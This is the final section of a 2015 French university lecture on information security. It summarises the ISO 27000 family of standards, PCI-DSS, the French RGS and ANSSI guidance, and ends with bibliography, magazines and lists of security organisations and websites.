On recommence
Concept associé aux normes ISO 9001
Ce sont des documents payants à récupérer sur le site de
l’ISO : 100 à 150 e

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 319 / 351


La qualité : sous-entendus

On écrit ce que l’on veut faire


On écrit ce que l’on fait
On définit des indicateurs pour mesurer ce que l’on fait
Le modèle PDCA s’applique de manière ”fractale”

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 320 / 351


Les normes ISO 27000

Pourquoi ?
ISO 27000 : Le vocabulaire
ISO 27001 : Le système de gestion de la sécurité SMSI
ISO 27002 : Les bonnes pratiques de la sécurité
ISO 27003 : Installation d’un SMSI
ISO 27004 : Indicateurs et tableaux de bord
ISO 27005 : La gestion du risque
ISO 27006 : Les audits de sécurité
ISO 27007 : Guide pour l’audit d’un SMSI

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 321 / 351


Les normes ISO 27000 sectorielles

ISO 27011 : Guide pour le secteur des télécommunications


ISO 27032 : Cybersécurité
ISO 27033 : Sécurité des réseaux informatiques
ISO 27034 : Sécurité applicative
ISO 27799 : Guide pour le secteur de la santé
Plus les autres (ISO 27012, ISO 27013, ...)

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 322 / 351


La norme ISO 27000

S’occupe des définitions et du vocabulaire


Publiée en 2009 et révisée en 2012
Ne donne pas lieu à une certification
Permet de parler de la même chose
Risque ?
Menace ?
Vulnérabilité ?

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 323 / 351


La norme ISO 27001

Mise en place d’un SMSI (Système de Management de la Sécurité


de l’Information)
Publiée en 2005, révisée en 2013
Donne lieu à une certification d’organisme
C’est quasiment une méta-norme qui référence les autres
La sécurité c’est ”ni trop, ni trop peu”
Cette certification peut être ”fumigène” : choix du périmètre et
des contraintes de sécurité
en aout 2007 : 5 certif françaises, 73 allemandes, 2280
japonaises

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 324 / 351


La norme ISO 27002

Ensemble de bonnes pratiques de la sécurité


Publiée
ex norme ISO 17799
133 mesures à prendre (mais pas toutes, car pas toujours
adaptées !)
11 chapitres
39 objectifs

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 325 / 351


La norme ISO 27003

Guide d’implémentation d’un SMSI


Publiée en 2010

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 326 / 351


La norme ISO 27004

Donne une liste d’indicateurs de sécurité à produire


A l’état de Draft
Ne donne pas lieu à une certification
20 indicateurs maximum
Indicateurs doivent être associés à des objectifs
Pas toujours ”informatiques”

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 327 / 351


La norme ISO 27005

Tout ce qui tourne autour de la gestion du risque informatique.


Ne donne pas les solutions pour diminuer le risque (les autres
normes s’en chargent)
Intégré dans la norme ISO31000 (gestion du risque global).
Donne lieu à une certification individuelle
En concurrence avec les méthodes Mehari, Ebios
Définition de mesures de risques
Définition de scénarii de menaces

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 328 / 351


La norme ISO 27006

Exigences que doivent remplir les organismes d’audit et de


certifications des SMSI.
Publiée et mise à jour en 2011
Donne lieu à une certification

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 329 / 351


La norme ISO 27007

Guide pour l’audit d’un SMSI


Draft
Recueil de bonnes pratiques

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 330 / 351


La norme ISO 27011

Guide pour le secteur des télécommunications


Publié en 2008

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 331 / 351


La norme ISO 27012

Guide pour le secteur des finances


Proposée (Stade avant le Draft) puis abandonnée.

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 332 / 351


La norme ISO 27013

Guide pour le secteur de l’industrie


publiée en 2012.

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 333 / 351


La norme ISO 27015

Directives pour l’accréditation


Publiée en 2012

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 334 / 351


La norme ISO 27016

Audits et revues
Publiée en 2014

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 335 / 351


La norme ISO 27031

Continuité d’activité
Publiée en 2011
Basée sur un British standard (BS 25999) et le (BC/DR
SS507) singapourien

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 336 / 351


La norme ISO 27032

Cybersécurité (Internet)
Publiée en 2012

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 337 / 351


La norme ISO 27033

Sécurité des réseaux informatiques


Publiée de 2009 à 2014 suivant les parties.
révision de l’ISO 18028
Découpé en 7 parties (27033-1, 27033-2, ...)

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 338 / 351


La norme ISO 27034

Sécurité Applicative
Publiée en 2011

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 339 / 351


La norme ISO 27799

Guide pour le secteur de la santé


Publiée en 2008
ISO 27002 spécifique au secteur de la santé

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 340 / 351


Comment cela s’applique ?

Le coeur est la norme ISO27001 et référence la plupart des autres.


C’est un modèle d’amélioration (PDCA)
On peut (doit) commencer petit
On peut (doit) accepter se donner le droit à l’erreur
On fait une analyse de risques de haut niveau
On sélectionne les risques à traiter
On regarde les bonnes pratiques (27002) qui correspondent
On fait une analyse du risque pour le reste (27005)

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 341 / 351


Quelques liens

http://www.club-27001.fr/ Association pour la promotion


de l’ISO 27001
http://www.iso27001security.com
http://www.iso27001certificates.com/ Qui est certifié ?

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 342 / 351


D’autres normes

D’autres normes, plus sectorielles existent pour améliorer la


sécurité
DCI-DSS et PA-DSS pour le secteur marchant utilisant les
cartes bancaires
RGS (1 et 2) pour l’état et ses administrations

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 343 / 351


DCI-DSS

Payment Card Industry


Norme bancaire réclamée à partir d’un certain C.A. associé à
Internet
Gratuite.
135 pages
12 conditions à respecter
La moitié en technique
La moitié en organisationnel
Actuellement en version 3.0
N’est pas une assurance de sécurité, mais de démarche
sécurité.
N’empêche absolument pas de se faire pirater du sol au
plafond.

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 344 / 351


RGS

Référentiel général de sécurité (RGS)


Version 2 publiée le 13 juin 2014, applicable depuis le 1er
juillet 2014
Concerne les téléservices de l’état.
Règles sur les applications web
Règles sur les certificats
Document
25 pages
5 annexes sur les certificats (de 14 à 89 pages)
3 annexes sur les mécanismes cryptographiques (de 29 à 63
pages)
1 annexe sur les prestataires d’audit

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 345 / 351


Guide d’hygiène informatique

Rédigée par l’ANSSI


40 règles
50 pages
Pas une norme, uniquement des bonnes pratiques
Inapplicable en totalité.
Mais quelques évidences... pas toujours appliquées.

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 346 / 351


PSSI Etat

Publiée le 17 juillet 2014


Version 1.0
42 pages très succintes
ne concerne que les SI ”classiques”
doit être appliquée dans les 3 ans après la publication

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 347 / 351


Bibliographie

TCP/IP Règles et protocoles (Stevens)


Firewalls and Internet Security (Cheswick & Bellovin)
Building Internet Firewalls (Chapman & Zwicky)

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 348 / 351


Quelques revues

MISC (pluridisciplinaire, complexe, reconnue)


http://www.miscmag.com
Hackin9 (version française d’un magazine anglais)
http://www.hakin9.org/

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 349 / 351


Les organismes pour vous aider

De nombreux organismes ou associations fournissent d’excellents


supports pour améliorer sa sécurité
l’OSSIR http://www.ossir.org
le CLUSIF http://www.clusif.fr
les CLUSIRs : émanations régionales du CLUSIF
les CERTs dont le CERTA http://www.certa.ssi.gouv.fr
le SANS http://www.sans.org
la NSA http://www.nsa.gov d’excellents documents
techniques de sécurisation
CAIDA http://www.caida.org
l’OWASP http://www.owasp.org
l’assocation Club 27001 http ://www.club-27001.fr/

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 350 / 351


Urlographie : informations

Quelques sites web référents dans le domaine de la sécurité.


http://www.securityfocus.com
http://sid.rstack.org/blog/index.php
http://news0ft.blogspot.com/
http://www.securite.org
http://www.hsc.fr
http://www.zataz.com/zatazv7
http://www.firewall-net.com
http://www.net-security.org
http://www.securitynewsportal.com
http://www.honeynet.org
http://insecure.org
http://www.murielle-cahen.com

Fabrice Prigent Sécurité Informatique/ 20 mars 2015 351 / 351

Vous aimerez peut-être aussi